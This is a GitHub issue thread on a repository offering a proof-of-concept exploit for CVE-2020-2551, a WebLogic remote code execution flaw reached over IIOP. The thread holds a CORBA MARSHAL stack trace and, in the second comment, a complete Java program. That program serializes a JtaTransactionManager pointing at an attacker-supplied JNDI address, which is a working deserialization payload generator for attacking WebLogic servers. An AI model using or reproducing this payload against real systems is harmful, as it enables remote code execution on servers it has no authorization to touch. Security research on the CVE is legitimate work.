search

hktalent / CVE-2020-2551

how detect CVE-2020-2551 poc exploit python Weblogic RCE with IIOP
211 stars 49 forks source link

java.rmi.MarshalException: CORBA MARSHAL 0 No; nested exception is #1

Closed hktalent closed 4 years ago

hktalent commented 4 years ago 
java.rmi.MarshalException: CORBA MARSHAL 0 No; nested exception is: 
    org.omg.CORBA.MARSHAL:   vmcid: 0x0  minor code: 0  completed: No
    at com.sun.corba.se.impl.javax.rmi.CORBA.Util.mapSystemException(Util.java:227)
    at javax.rmi.CORBA.Util.mapSystemException(Util.java:95)
    at org.omg.stub.javax.management.j2ee._ManagementHome_Stub.remove(Unknown Source)

Caused by: org.omg.CORBA.MARSHAL:   vmcid: 0x0  minor code: 0  completed: No
    at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
    at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
    at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
    at java.lang.reflect.Constructor.newInstance(Constructor.java:423)
    at java.lang.Class.newInstance(Class.java:442)
    at com.sun.corba.se.impl.protocol.giopmsgheaders.MessageBase.getSystemException(MessageBase.java:916)
    at com.sun.corba.se.impl.protocol.giopmsgheaders.ReplyMessage_1_2.getSystemException(ReplyMessage_1_2.java:116)
    at com.sun.corba.se.impl.protocol.CorbaMessageMediatorImpl.getSystemExceptionReply(CorbaMessageMediatorImpl.java:590)
    at com.sun.corba.se.impl.protocol.CorbaClientRequestDispatcherImpl.processResponse(CorbaClientRequestDispatcherImpl.java:489)
    at com.sun.corba.se.impl.protocol.CorbaClientRequestDispatcherImpl.marshalingComplete(CorbaClientRequestDispatcherImpl.java:373)
    at com.sun.corba.se.impl.protocol.CorbaClientDelegateImpl.invoke(CorbaClientDelegateImpl.java:148)
    at org.omg.CORBA.portable.ObjectImpl._invoke(ObjectImpl.java:475)
    ... 3 more
hktalent commented 4 years ago 
 import com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager;
 import java.io.ObjectOutputStream;

 public class GeneratePayload
 {
   public static void main(String[] args) throws Exception
   {
     if (args.length != 1) {
       System.err.println("java -jar weblogic-spring-jndi.jar <jndi_address>");
       System.exit(-1);
     }

     String jndiAddress = args[0];
     JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
     jtaTransactionManager.setUserTransactionName(jndiAddress);

     java.io.PrintStream out = System.out;
     ObjectOutputStream objOut = new ObjectOutputStream(out);
     objOut.writeObject(jtaTransactionManager);
   }
 }